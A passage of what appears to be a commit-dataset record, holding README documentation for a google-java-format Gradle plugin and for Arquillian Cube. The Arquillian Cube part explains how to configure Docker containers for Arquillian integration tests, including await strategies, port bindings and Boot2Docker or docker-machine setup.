source 'src\/main'\n source 'src\/test'\n include '**\/*.java'\n exclude '**\/*Template.java'\n}\n\ntask verifyFormatting(type: VerifyGoogleJavaFormat) {\n source 'src\/main'\n include '**\/*.java'\n ignoreFailures true\n}\n----\n\n\n\n== Snapshots\nOn every push to the master branch https:\/\/travis-ci.org\/[Travis] runs\nthe tests and, if all tests pass, publishes the built artifact to\nhttps:\/\/oss.sonatype.org\/content\/repositories\/snapshots\/[Sonatype's\n`snapshots` repository]. Use the following build script snippet for\nthe current snapshot version:\n\n[source,groovy]\n[subs=\"attributes\"]\n----\nbuildscript {\n repositories {\n maven {\n url 'https:\/\/oss.sonatype.org\/content\/repositories\/snapshots\/'\n }\n }\n dependencies {\n classpath 'com.github.sherter.googlejavaformatgradleplugin:google-java-format-gradle-plugin:{snapshot-version}'\n }\n}\n\napply plugin: 'com.github.sherter.google-java-format'\n","old_contents":"= google-java-format-gradle-plugin\n:release-version: 0.2\n:default-google-java-format-version: 0.1-alpha\n:snapshot-version: 0.3-SNAPSHOT\n\n\nA https:\/\/github.com\/gradle\/gradle[Gradle] plugin that utilizes\nhttps:\/\/github.com\/google\/google-java-format[google-java-format] to\nformat the Java source files in your Gradle project.\n\nimage:https:\/\/travis-ci.org\/sherter\/google-java-format-gradle-plugin.svg?branch=master[\"Build\nStatus\",\nlink=\"https:\/\/travis-ci.org\/sherter\/google-java-format-gradle-plugin\"]\n\n== Quick Start\n* Apply the plugin in your build script (follow https:\/\/plugins.gradle.org\/plugin\/com.github.sherter.google-java-format[these instructions]\nfor Gradle versions below `2.1`)\n+\n[source,groovy]\n[subs=\"attributes\"]\n----\nplugins {\n id 'com.github.sherter.google-java-format' version '{release-version}'\n}\n----\n+\n\n* Make sure you have defined a repository that contains version `{default-google-java-format-version}` of `google-java-format`\n+\n[source,groovy]\n----\nrepositories {\n jcenter() \/\/ or mavenCentral()\n}\n----\n\n* Execute the task `googleJavaFormat` to format all `*.java` files in the project\n+\n[source,shell]\n----\n$ .\/gradlew goJF\n----\n+\n* Execute the task `verifyGoogleJavaFormat` to verify that all `*.java` files are formatted properly\n+\n[source,shell]\n----\n$ .\/gradlew verGJF\n----\n\n== Extended Usage\n* The plugin adds the extension `googleJavaFormat` to your project. Adjust the variable `toolVersion` to use a specific version of `google-java-format`. You can even define `SNAPSHOT` versions, but make sure that you have added a repository to the project that contains this version (e.g. `mavenLocal()`). For plugin version `{release-version}` this value defaults to `{default-google-java-format-version}`. On every new release the default value will be updated to the latest version of `google-java-format`.\n+\n[source,groovy]\n[subs=\"attributes\"]\n----\ngoogleJavaFormat {\n toolVersion '0.1-SNAPSHOT'\n}\n----\n\n* The predefined tasks `googleJavaFormat` and `verifyGoogleJavaFormat` by default process all `*.java` files found in the project or any subproject (except for files in a `buildDir`). If you want to exclude specific files from a predefined task you can use https:\/\/docs.gradle.org\/2.0\/javadoc\/org\/gradle\/api\/tasks\/util\/PatternFilterable.html[Ant-style exclude patterns].\n+\n[source,groovy]\n[subs=\"attributes\"]\n----\ntasks.googleJavaFormat {\n exclude '**\/*Template.java'\n exclude 'src\/test\/template_*'\n}\n----\n\n* Define your own format or verification tasks, if the predefined ones don't suite you needs. Both task types `GoogleJavaFormat` and `VerifyGoogleJavaFormat` are subtypes of `https:\/\/docs.gradle.org\/2.0\/javadoc\/org\/gradle\/api\/tasks\/SourceTask.html[SourceTask]` and can be configured accordingly. The task type `VerifyGoogleJavaFormat` also implements the interface `https:\/\/docs.gradle.org\/2.0\/javadoc\/org\/gradle\/api\/tasks\/VerificationTask.html[VerificationTask]`.\n+\n[source,groovy]\n----\nimport com.github.sherter.googlejavaformatgradleplugin.GoogleJavaFormat\nimport com.github.sherter.googlejavaformatgradleplugin.VerifyGoogleJavaFormat\n\ntask format(type: GoogleJavaFormat) {\n source 'src\/main'\n source 'src\/test'\n include '**\/*.java'\n exclude '**\/*Template.java'\n}\n\ntask verifyFormatting(type: VerifyGoogleJavaFormat) {\n source 'src\/main'\n include '**\/*.java'\n ignoreFailures true\n}\n----\n\n== Snapshots\nOn every push to the master branch https:\/\/travis-ci.org\/[Travis] runs\nthe tests and, if all tests pass, publishes the built artifact to\nhttps:\/\/oss.sonatype.org\/content\/repositories\/snapshots\/[Sonatype's\n`snapshots` repository]. Use the following build script snippet for\nthe current snapshot version:\n\n[source,groovy]\n[subs=\"attributes\"]\n----\nbuildscript {\n repositories {\n maven {\n url 'https:\/\/oss.sonatype.org\/content\/repositories\/snapshots\/'\n }\n }\n dependencies {\n classpath 'com.github.sherter.googlejavaformatgradleplugin:google-java-format-gradle-plugin:{snapshot-version}'\n }\n}\n\napply plugin: 'com.github.sherter.google-java-format'\n----\n\n=== New Features\n* Support for options:\n+\n[source,groovy]\n----\ngoogleJavaFormat {\n options <type>: <value>, <type>: <value>, ... \/\/ e.g. options style: 'AOSP'\n}\n----\n|===\n|option | possible values\n\n|style\n|'GOOGLE', 'AOSP'\n|===\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"1eeb18daac3fccc65312124ddb82d435c86eba21","subject":"Replace links to previous docs to 3 latest releases","message":"Replace links to previous docs to 3 latest releases\n","repos":"lordofthejars\/arquillian-cube,AndyGee\/arquillian-cube,AndyGee\/arquillian-cube,AndyGee\/arquillian-cube,spolti\/arquillian-cube,spolti\/arquillian-cube,spolti\/arquillian-cube,mikesir87\/arquillian-cube,mikesir87\/arquillian-cube,lordofthejars\/arquillian-cube,lordofthejars\/arquillian-cube,mikesir87\/arquillian-cube","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Arquillian Cube\n\nDocumentation for version Alpha6 can be found here: https:\/\/github.com\/arquillian\/arquillian-cube\/blob\/1.0.0.Alpha6\/README.adoc\n\nDocumentation for version Alpha5 can be found here: https:\/\/github.com\/arquillian\/arquillian-cube\/blob\/1.0.0.Alpha5\/README.adoc\n\nDocumentation for version Alpha4 can be found here: https:\/\/github.com\/arquillian\/arquillian-cube\/blob\/1.0.0.Alpha4\/README.adoc\n\n\nWARNING: 1.0.0.Alpha7 breaks incompatibility with previous versions in some cases. The major difference is that instead of using the _boot2docker_ keyword to refer to the auto resolved boot2docker ip in the _serverUri_ parameter, you should now used _dockerHost_.\n\n== What is this?\n\n*Arquillian Cube* is an _Arquillian_ extension that can be used to manager _Docker_ containers from _Arquillian_.\n\nExtension is named *Cube* for two reasons:\n\n* Because Docker is like a cube\n* Because http:\/\/en.memory-alpha.org\/wiki\/Borg_cube[Borg starship] is named *cube* and well because we are moving tests close to production we can say that \"any resistance is futile, bugs will be assimilated\".\n\nWith this extension you can start a _Docker_ container with a server installed, deploy the required deployable file within it and execute _Arquillian_ tests.\n\nThe key point here is that if _Docker_ is used as deployable platform in production, your tests are executed in a the same container as it will be in production, so your tests are even more real than before.\n\nBut it also lets you start a container with every required service like database, mail server, ... and instead of stubbing or using fake objects your tests can use real servers.\n\n[WARNING]\n====\nThis extension has been developed and tested on a Linux machine with the _Docker_ server already installed.\nIt works with *Boot2Docker* as well in _Windows_ and _MacOS_ machines, but some parameters like _host ip_ must be the _Boot2Docker_ server instead of _localhost_ (in case you have _Docker_ server installed inside your own machine).\n\nOne of the best resources to learn about why using _Boot2Docker_ is different from using _Docker_ in Linux can be read here http:\/\/viget.com\/extend\/how-to-use-docker-on-os-x-the-missing-guide\n====\n\n== Preliminaries\n\n*Arquillian Cube* relies on https:\/\/github.com\/docker-java\/docker-java[docker-java] API.\n\nTo use *Arquillian Cube* you need a _Docker_ daemon running on a computer (it can be local or not), but probably it will be at local.\n\nBy default the _Docker_ server uses UNIX sockets for communicating with the _Docker_ client. *Arquillian Cube* will attempt to detect the operating system it is running on and either set _docker-java_ to use UNIX socket on _Linux_ or to <<Boot2Docker>> on _Windows_\/_Mac_ as the default URI.\n\nIf you want to use TCP\/IP to connect to the Docker server, you'll need to make sure that your _Docker_ server is listening on TCP port.\nTo allow _Docker_ server to use TCP add the following line to +\/etc\/default\/docker+:\n\n+DOCKER_OPTS=\"-H tcp:\/\/127.0.0.1:2375 -H unix:\/\/\/var\/run\/docker.sock\"+\n\nAfter restarting the _Docker_ daemon you need to make sure that _Docker_ is up and listening on TCP.\n\n[source, terminal]\n----\n$ docker -H tcp:\/\/127.0.0.1:2375 version\n\nClient version: 0.8.0\nGo version (client): go1.2\nGit commit (client): cc3a8c8\nServer version: 1.2.0\nGit commit (server): fa7b24f\nGo version (server): go1.3.1\n----\n\nIf you cannot see the client and server versions then it means that something is wrong with the _Docker_ installation.\n\n== Basic Example\n\nAfter having a _Docker_ server installed we can start using *Arquillian Cube*.\nIn this case we are going to use a very simple example using a _Docker_ image with _Apache Tomcat_ and we are going to test a _Servlet_ on it.\n\n[source, java]\n.HelloWorldServlet.java\n----\n@WebServlet(\"\/HelloWorld\")\npublic class HelloWorldServlet extends HttpServlet {\n\n @Override\n protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {\n PrintWriter writer = resp.getWriter();\n writer.println(\"Hello World\");\n }\n}\n----\n\n[source, java]\n.HelloWorldServletTest.java\n----\n@RunWith(Arquillian.class)\npublic class HelloWorldServletTest {\n\n @Deployment(testable=false) \/\/<1>\n public static WebArchive create() {\n return ShrinkWrap.create(WebArchive.class, \"hello.war\").addClass(HelloWorldServlet.class); \/\/<2>\n }\n\n @Test\n public void should_parse_and_load_configuration_file(@ArquillianResource URL resource) throws IOException { \/\/<3>\n\n URL obj = new URL(resource, \"HelloWorld\");\n HttpURLConnection con = (HttpURLConnection) obj.openConnection();\n con.setRequestMethod(\"GET\");\n\n BufferedReader in = new BufferedReader(\n new InputStreamReader(con.getInputStream()));\n String inputLine;\n StringBuffer response = new StringBuffer();\n\n while ((inputLine = in.readLine()) != null) {\n response.append(inputLine);\n }\n in.close();\n\n assertThat(response.toString(), is(\"Hello World\"));\/\/<4>\n }\n}\n----\n<1> In this case we are running the test as a client. So in fact this test is executed against the container instead of inside the container.\n<2> No changes in this part, we need to create a deployable file, and because we are testing against _Tomcat_, a _war_ file is created.\n<3> Because the test is run as client, we can use +@ArquillianResource+ to get the URL where the file is deployed. Note that this will be the URL to access _Tomcat_ running inside the _Docker_ container.\n<4> Typical jUnit assertion of servlet response.\n\nNow this test could be run in any container, there is nothing that ties this to _Docker_.\nNext step is adding some dependencies apart from the typical _Arquillian_ dependencies.\n\n[source, xml]\n.pom.xml\n----\n<dependency>\n <groupId>org.arquillian.cube<\/groupId>\n <artifactId>arquillian-cube-docker<\/artifactId> <!--1-->\n <version>${project.version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n\n<dependency>\n <groupId>org.jboss.arquillian.container<\/groupId>\n <artifactId>arquillian-tomcat-remote-7<\/artifactId> <!--2-->\n <version>1.0.0.CR7<\/version>\n <scope>test<\/scope>\n<\/dependency>\n----\n<1> Adds *Arquillian Cube* dependency.\n<2> From the point of view of _Arquillian_, _Tomcat_ is being executed in a remote host (in fact this is true because _Tomcat_ is running inside _Docker_ which is external to _Arquillian_), so we need to add the remote adapter.\n\nAnd finally we need to configure _Tomcat_ remote adapter and *Arquillian Cube* in +arquillian.xml+ file.\n\n[source, xml]\n.arquillian.xml\n----\n<?xml version=\"1.0\"?>\n<arquillian xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns=\"http:\/\/jboss.org\/schema\/arquillian\"\n xsi:schemaLocation=\"http:\/\/jboss.org\/schema\/arquillian\n http:\/\/jboss.org\/schema\/arquillian\/arquillian_1_0.xsd\">\n\n <extension qualifier=\"docker\"> <!--1-->\n <property name=\"serverVersion\">1.12<\/property> <!--2-->\n <property name=\"serverUri\">http:\/\/localhost:2375<\/property> <!--3-->\n <property name=\"dockerContainers\"> <!--4-->\n tomcat:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: polling\n env: [TOMCAT_PASS=mypass, JAVA_OPTS=-Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false]\n portBindings: [8089\/tcp, 8080\/tcp]\n <\/property>\n <\/extension>\n\n <container qualifier=\"tomcat\" default=\"true\"> <!--5-->\n <configuration>\n <property name=\"host\">localhost<\/property> <!--6-->\n <property name=\"httpPort\">8080<\/property> <!--7-->\n <property name=\"user\">admin<\/property> <!--8-->\n <property name=\"pass\">mypass<\/property>\n <\/configuration>\n <\/container>\n\n<\/arquillian>\n----\n<1> *Arquillian Cube* extension is registered.\n<2> _Docker_ server version is required.\n<3> _Docker_ server URI is required. In case you are using a remote _Docker_ host or _Boot2Docker_ here you need to set the remote host ip, but in this case _Docker_ server is on same machine.\n<4> A _Docker_ container contains a lot of parameters that can be configured. To avoid having to create one XML property for each one, a YAML content can be embedded directly as property.\n<5> Configuration of _Tomcat_ remote adapter. Cube will start the _Docker_ container when it is ran in the same context as an _Arquillian_ container with the same name.\n<6> Host can be _localhost_ because there is a port forwarding between container and _Docker_ server.\n<7> Port is exposed as well.\n<8> User and password are required to deploy the war file to remote _Tomcat_.\n\nAnd that's all.\nNow you can run your test and you will see how _tutum\/tomcat:7.0_ image is downloaded and started.\nPorts 8080 (Tomcat standard port) and 8089(JMX port used by Arquillian) are exposed.\nFinally in _env_ section, environment variables are set. Read next link to understand why this is required https:\/\/docs.jboss.org\/author\/display\/ARQ\/Tomcat+7.0+-+Remote\n\n== Configuration\n\n*Arquillian Cube* requires some parameters to be configured, some related with _Docker_ server and others related on the image that is being used.\nLet's see valid attributes:\n\n[cols=\"2*\"]\n|===\n|serverVersion\n|Version of REST API provided by_Docker_ server. You should check on the _Docker_ site which version of REST API is shipped inside installed _Docker_ service. This field is not mandatory and if it's not set the default provided version from _docker-java_ will be used.\n\n|serverUri\n|Uri of _Docker_ server. If the _Docker_ server is running natively on Linux then this will be an URI pointing to _localhost_ docker host but if you are using _Boot2Docker_ or a remote _Docker_ server then the URI should be changed to point to the _Docker_ remote _URI_. It can be a unix socket URI as well in case you are running _Docker_ on Linux (+unix:\/\/\/var\/run\/docker.sock+). Also you can read at <<automatic-resolution, this section>> about automatic resolution of serverUri parameter. Also you can use `DOCKER_HOST` java property or system environment to set this parameter.\n\n|dockerRegistry\n|Sets the location of Docker registry. Default value is the official _Docker_ registry located at https:\/\/registry.hub.docker.com\n\n|dockerContainers\n|Each _Docker_ image (or container) can be configured with different parameters. This configuration is provided in YAML format. This property can be used to embed as YAML string value, all configuration.\n\n|dockerContainersFile\n|Instead of embedding YAML as a string, you can set the location of a YAML file with this attribute. The location can be a relative from the root of the project or also a URI that is converted to URL so you can effectively have docker definitions on remote sites.\n\n|definitionFormat\n|Sets the format of content expressed in `dockerContainers` attribute or in file set in `dockerContainersFile`. It can contain two possible values _CUBE_ (default one in case of not set) to indicate that content is written following <<cube-format, Arquillian Cube>> format or _COMPOSE_ to indicate that content is written following <<docker-compose-format, Docker Compose>> format.\n\n|autoStartContainers\n|Cube will normally only start a _Docker_ container when it has the same name as an active _Arquillian_ container. That works for things that are _DeployableContainer_'s. For any other service, e.g. a database, you can use the _autoStartContainers_ option to define which _Docker_ containers to automatically start up. The option takes a comma separated list of _Docker_ container ids. e.g. _tomcat7, mysql_. *Arquillian Cube* will attempt to start the containers in parallel if possible as well as start any linked containers.\n\n|certPath\n|Path where certificates are stored. If you are not using _https_ protocol this parameter is not required. This parameter accepts starting with ~ as home directory\n\n|boot2dockerPath\n|Sets the full location (and program name) of _boot2docker_. For example +\/opt\/boot2dockerhome\/boot2docker+.\n\n|dockerMachinePath\n|Sets the full location (and program name) of _docker-machine_. For example +\/opt\/dockermachinehome\/docker-machine+.\n\n|machineName\n|Sets the machine name in case you are using docker-machine to manage your docker host. This parameter is mandatory when using docker-machine.\n\n|connectionMode\n|Connection Mode to bypass the Create\/Start Cube commands if the a Docker Container with the same name is already running on the target system. This parameter can receive three possible values. _STARTANDSTOP_ which is the default one if not set any and simply creates and stops all Docker Containers. If a container is already running, an exception is thrown. _STARTORCONNECT_ mode tries to bypass the Create\/Start Cube commands if a container with the same name is already running, and if it is the case doesn\u2019t stop it at the end. But if container is not already running, Cube will start one and stop it at the end of the execution. And last mode is _STARTORCONNECTANDLEAVE_ which is exactly the same of _STARTORCONNECT_ but if container is started by Cube it won\u2019t be stopped at the end of the execution so it can be reused in next executions.\n|===\n\nSome of these properties can be provided by using standard Docker system environment variables so you can set once and use them in your tests too.\nMoreover you can set as Java system properties (-D...) as well.\n\n[cols=\"2*\"]\n|===\n|serverUri\n|DOCKER_HOST\n\n|certPath\n|DOCKER_CERT_PATH\n\n|machineName\n|DOCKER_MACHINE_NAME\n|===\n\nIn the next example you can see a whole YAML document with configuration properties.\nKeep in mind that almost all of them are configuration parameters provided by _Docker_ remote API.\nIn this example we are going to explain the attributes that are most used and special cases.\nOf course not all of them are mandatory:\n\nNOTE: In YAML adding brackets (\"[\" \"]\") is for setting a list.\n\n[[cube-format]]\n[source, yaml]\n----\ntomcat: #1\n image: tutum\/tomcat:7.0 #2\n exposedPorts: [8089\/tcp] #3\n await: #4\n strategy: polling #5\n workingDir: .\n alwaysPull: false\n disableNetwork: true\n hostName: host\n portSpecs: [80,81]\n user: alex\n tty: true\n stdinOpen: true\n stdinOnce: true\n memoryLimit: 1\n memorySwap: 1\n cpuShares: 1\n cpuSet: a\n extraHosts: a\n attachStdin: true\n attachStderr: true\n env: [TOMCAT_PASS=mypass, JAVA_OPTS=-Dcom.sun.management.jmxremote.port=8089] #6\n cmd: [] #7\n dns: [127.0.0.1]\n volumes: [\/tmp]\n volumesFrom: [tomcat]\n binds:\n - \/host:\/container:ro\n links:\n - name:alias\n - name2:alias2\n portBindings: [8089\/tcp, 8081->8080\/tcp] #8\n privileged: true\n publishAllPorts: true\n networkMode: host\n dnsSearch: [127.0.0.1]\n entryPoint: [sh]\n devices:\n cGroupPermissions: a\n pathOnHost: b\n pathInContainer: c\n restartPolicy: #10\n name: failure\n maximumRetryCount: 1\n capAdd: [a]\n capDrop: [b]\n extends: container-id #9\n----\n<1> The name that are going to be assign to running container. It is *mandatory*.\n<2> The name of the image to be used. It is *mandatory*. If the image has not already been pulled by the _Docker_ server, *Arquillian Cube* will pull it for you. If you want to always pull latest image before container is created, you can configure *alwaysPull: true*.\n<3> Sets exposed ports of the running container. It should follow the format _port number_ slash(\/) and _protocol (udp or tcp). Note that it is a list and it is not mandatory.\n<4> After a container is started, it starts booting up the defined services\/commands. Depending on the nature of service, the lifecycle of these services are linked to start up or not. For example Tomcat, Wildlfy, TomEE and in general all Java servers must be started in foreground and this means that from the point of view of the client, the container never finishes to start. But on the other side other services like Redis are started in background and when the container is started you can be sure that Redis server is there. To avoid executing tests before the services are ready, you can set which await strategy should be used from *Arquillian Cube* side to accept that _Docker_ container and all its defined services are up and ready. It is not mandatory and by default polling with _ss_ command strategy is used.\n<5> In +strategy+ you set which strategy you want to follow. Currently three strategies are supported. _static_, _native_ and _polling_.\n<6> You can pass environment variables by using `env`. In this section you can set special `dockerServerIp` string which at runtime will be replaced by _Cube_ to current docker server ip.\n<7> After the container is up, a list of commands can be executed within it.\n<8> Port forwarding is configured using `portBinding` section. It contains a list of `exposedPort` and `port` separated by arrow (_->_). If only one port is provided, *Arquillian Cube* will expose the same port number. In this example the exposed port 8089 is mapped to 8089 and exposed port 8080 is mapped to 8081.\n<9> You can extend another configuration. Any top level element and it's children from the target container-id will be copied over to this configuration, unless they have been defined here already.\n\nAs we've seen in the basic example the definition of the Arquillian Cube scenarios are described in `dockerContainers` property.\nBut if you want you can avoid using this property by simply creating a file called `cube` in the root of the classpath of your project.\n_Arquillian Cube_ will read it as if it was defined in `arquilllian.xml` file.\n\n[source, yaml]\n.src\/test\/resources\/cube\n----\ntomcat:\n image: tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: polling\n env: [TOMCAT_PASS=mypass, JAVA_OPTS=-Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false]\n portBindings: [8089\/tcp, 8080\/tcp]\n----\n\n=== Await\n\nAfter a container is started, it starts booting up the defined services\/commands.\nDepending on the nature of service, the lifecycle of these services are linked to start up or not.\nFor example Tomcat, Wildlfy, TomEE and in general all Java servers must be started in foreground and this means that from the point of view of the _Docker_ client, the container never finishes to start.\nBut on the other side other services like Redis are started in background and when the container is started you can be sure that Redis server is there.\nTo avoid executing tests before the services are ready, you can set which await strategy should be used from *Arquillian Cube* side to accept that _Docker_ container and all its defined services are up and ready.\n\nCurrently next await strategies are supported:\n\nnative:: it uses *wait* command. In this case current thread is waiting until the _Docker_ server notifies that has started. In case of foreground services this is not the approach to be used.\npolling:: in this case a polling (with _ping_ or _ss_ command) is executed for 5 seconds against all exposed ports. When communication to all exposed ports is acknowledged, the container is considered to be up. This approach is the one to be used in case of services started in foreground. By default _polling_ executes _ss_ command inside the running container to know if the server is already running. You can use a _ping_ from client by setting +type+ attribute to +ping+; Note that _ping_ only works if you are running _Docker_ daemon on +localhost+. In almost all cases the default behaviour matches all scenarios. If it is not specified, this is the default strategy.\nstatic:: similar to _polling_ but it uses the host ip and specified list of ports provided as configuration parameter. This can be used in case of using _Boot2Docker_.\nsleeping:: sleeps current thread for the specified amount of time. You can specify the time in seconds or milliseconds.\n\nBy default in case you don't specify any _await_ strategy, polling with _ss_ command is used.\n\n[source, yaml]\n.Example native\n----\ntomcat:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: native\n----\n\n[source, yaml]\n.Example polling using ss command by default\n----\ntomcat:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: polling\n sleepPollingTime: 200 s #1\n iterations: 3 #2\n----\n<1> Optional parameter to configure sleeping time between poling. You can set in seconds using _s_ or miliseconds using _ms_. By default time unit is miliseconds and value 500.\n<2> Optional parameter to configure number of retries to be done. By default 10 iterations are done.\n\n[source, yaml]\n.Example static\n----\ntomcat:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: static\n ip: localhost\n ports: [8080, 8089]\n----\n\n[source, yaml]\n.Example sleeping\n----\ntomcat:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: sleeping\n sleepTime: 200 s #1\n----\n<1> Optional parameter to configure sleeping time between poling. You can set in seconds using _s_ or miliseconds using _ms_. By default time unit is miliseconds and value 500.\n\n=== Inferring exposedPorts from portBinding\n\nWhen you are using _Docker_ you can set two different parameters, +exposedPort+ and +portBinding+.\n+exposedPorts+ are ports that are available inside _Docker_ infrastructure and they are used for communication between _Docker_ containers but not from outside.\nOn the other side +portBindings+ are a way to instruct _Docker_ container to publish a port to be available from outside (for example from our test).\n\nIt seems reasonable that if you set a port binding this port should automatically be exposed port as well.\nFor this reason in *Arquillian Cube* you can use +portBinding+ and it will automatically set to exposed port.\n\nIn next example we are only setting +portBinding+ and *Arquillian Cube* will instruct _Docker_ to expose port 8080 and of course bind the port 8080 so it can be accessible from outside.\n\n[source, xml]\n.arquillian.xml\n----\ndaytime:\n buildImage:\n dockerfileLocation: src\/test\/resources\/undertow\n noCache: true\n remove: true\n await:\n strategy: polling\n portBindings: [8080\/tcp]\n----\n\nAlso it is not necessary to set the network protocol (tcp or udp).\nIf protocol is not specified `portBindings: [\"8080\"]` then _tcp_ is used by default.\nNotice that you need to add double-quotes to stringify the value.\n\n=== Allow connecting to a running container\n\nWith the configuration option +connectionMode+ you can bypass\nthe Create\/Start Cube commands if the a _Docker_ Container with the same name is already\nrunning on the target system. If so, *Arquillian Cube* will reuse that Container moving forward.\n\nThis allows you to prestart the containers manually during development and just\nconnect to them to avoid the extra cost of starting the _Docker_ Containers for each test\nrun. This assumes you are not changing the actual definition of the _Docker_ Container itself.\n\nAn example of this configuration could be:\n\n[source, xml]\n.arquillian.xml\n----\n<extension qualifier=\"docker\">\n <property name=\"serverVersion\">1.12<\/property>\n <property name=\"serverUri\">http:\/\/localhost:2375<\/property>\n <property name=\"connectionMode\">STARTORCONNECT<\/property>\n <property name=\"dockerContainers\">\n tomcat:\n #more properties\n <\/property>\n<\/extension>\n----\n\n+connectionMode+ is an attribute that can receive three parameters:\n\nSTARTANDSTOP:: it is the default one if not set any and simply creates and stops all _Docker_ Containers. If a container is already running, an exception is thrown.\nSTARTORCONNECT:: it tries to bypass the Create\/Start Cube commands if a container with the same name is already running, and if it is the case doesn\u2019t stop it at the end. But if container is not already running, Cube will start one and stop it at the end of the execution.\nSTARTORCONNECTANDLEAVE:: it is exactly the same of _STARTORCONNECT_ but if container is started by Cube it won\u2019t be stopped at the end of the execution so it can be reused in next executions.\n\n=== Before Stop Events\n\nSometimes when the tests has finished and container is stopped you want to inspect some data like container console or getting a file from the container to manual inspecting.\nIn these cases you can configure each container to copy console log or copy a file\/s from container to local machine just before container is stopped.\n\nNext snippet shows how to copy a directory from container to local disk:\n\n[source, yaml]\n----\ntomcat_default:\n image: tutum\/tomcat:7.0\n beforeStop: # <1>\n - copy: # <2>\n from: \/test\n to: \/tmp\n\n - log: # <3>\n to: \/tmp\/container.log\n----\n<1> +beforeStop+ goes into the container section and may contain a list of +copy+ and +log+ elements.\n<2> +copy+ is used to notify that we want to copy some directories or files form +from+ container location to +to+ local location.\n<3> +log+ is used to notify that we want to copy container log to +to+ local location.\n\nIn case of +log+ command the standard output and the error output are returned.\n+log+ _Docker_ command can receive some configuration paramters and you can set them too in configuration file.\n\n[source, yaml]\n.Example of log parameters\n----\nbeforeStop:\n - log:\n to: \/tmp\/container.log\n follow: true\n stdout: true\n stderr: false\n timestamps: true\n tail: 10\n----\n\n[[automatic-resolution]]\n=== Automatic serverUri resolution\n\n+serverUri+ parameter is where you configure the Uri of _Docker_ server.\nThis parameter is not mandatory and in case you don't set it, _Arquillian Cube_ will use next values:\n\n[cols=\"2*\"]\n|===\n|Linux\n|unix:\/\/\/var\/run\/docker.sock\n\n|Windows\n|https:\/\/dockerHost:2376\n\n|MacOS\n|https:\/\/dockerHost:2376\n\n|Docker Machine\n|https:\/\/dockerHost:2376\n|===\n\n[[boot2docker]]\n== Boot2Docker and Docker Machine\n\nIf you are using _boot2docker_ or _docker machine_ there are some parameters that depends on the local installation.\nFor example _boot2docker_ ip is not _localhost_ and may change every time you start a new _boot2docker_ instance.\nAlso every time you start _boot2docker_ copies required certificates to home directory of local machine.\n\n_Arquillian Cube_ offers some automatic mechanisms to use _boot2docker_ or _docker machine_ in _Cube_.\n\nThe first one is that +serverUri+ parameter can contain the word +dockerHost+ like for example +https:\/\/dockerHost:2376+.\nWhen _Cube_ is started it will check if the +serverUri+ contains the _dockerHost_ word, and if it is the case it will do next things:\n\n. if docker machine name is provided by using +machineName+ property then Docker Machine command is run to get the ip to be replaced in `dockerHost`.\n. if previous conditions are not met, then _boot2docker_ command is run to get the ip to be replaced in `dockerHost`.\n\n=== Boot2Docker\n\nIn case of _boot2docker_ it will run the command +boot2docker ip+ to get the ip and substitute the _dockerHost_ keyword to the ip returned by that command.\n\nNote that by default _Arquillian Cube_ assumes that +boot2docker+ command is on +PATH+, but you can configure its location by using +boot2dockerPath+ property which is the full location (and program name) of _boot2docker_.\nFor example +\/opt\/boot2dockerhome\/boot2docker+.\n\n_boot2docker_ runs in _https_ and you need to set the certificates path.\nThese certificates are copied by _boot2docker_ by default at +<HOME>\/.boot2docker\/certs\/boot2docker-vm+.\nIf this property is not set and the +serverUri+ contains +dockerHost+, then this property is automatically configured to +<HOME>\/.boot2docker\/certs\/boot2docker-vm+ so you don't need to worry to set for each environment.\n\n=== Docker Machine\n\nIn case of _docker-machine_ it will run the command +docker-machine ip <machineName>+ to get the ip and substitute the _dockerHost_ keyword to the ip returned by that command.\n\nNote that by default _Arquillian Cube_ assumes that +docker-machine+ command is on +PATH+, but you can configure its location by using the +dockerMachinePath+ proeprty which is the full location (and program name too) of _docker-machine_.\nFor example +\/usr\/bin\/docker-machine+..\n\n_docker-machine_ can run with _boot2docker_ together.\nAnd this docker host instance runs in _https_ so you need to set the certificates path.\nThese certificates are copied by _docker-machine_ by default at +<HOME>\/.docker\/machine\/machines+.\nIf this property is not set and _docker-machine_ is run, then this property is automatically configured to default location, so you don't need to worry to set for each environment.\n\nFor example you can configure +arquillian.xml+ file to use _docker-machine_ as:\n\n[source, xml]\n.arquillian.xml\n----\n<extension qualifier=\"docker\">\n <property name=\"serverVersion\">${docker.api.version}<\/property>\n <property name=\"definitionFormat\">COMPOSE<\/property>\n <property name=\"machineName\">dev<\/property> <!-- 1 -->\n <property name=\"dockerContainersFile\">docker-compose.yml<\/property>\n<\/extension>\n----\n<1> Sets docker machine to _dev_.\n\nNotice that you only need to add _machineName_ property, everything else it is exactly the same as previous examples.\n\n== Building containers\n\nTo build a container _Docker_ uses a file called +Dockerfile+ http:\/\/docs.docker.com\/reference\/builder\/.\n*Arquillian Cube* also supports building and running a container from a +Dockerfile+.\n\nTo set that *Arquillian Cube* must build the container, the +image+ property must be changed to +buildImage+ and add the location of +Dockerfile+.\n\nLet's see previous example but instead of creating a container from a predefined image, we are going to build one:\n\n[source, yaml]\n.arquillian.xml\n----\n<property name=\"dockerContainers\">\n tomcat:\n buildImage: #1\n dockerfileLocation: src\/test\/resources-tomcat-7-dockerfile\/tomcat #2\n noCache: true #3\n remove: true #4\n dockerfileName: my-dockerfile #5\n await:\n strategy: polling\n env: [JAVA_OPTS=-Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false]\n portBindings: [8089\/tcp, 8080\/tcp]\n<\/property>\n----\n<1> +buildImage+ section is used in front of +image+. In case of both sections present in a document, +image+ section has preference over +buildImage+.\n<2> 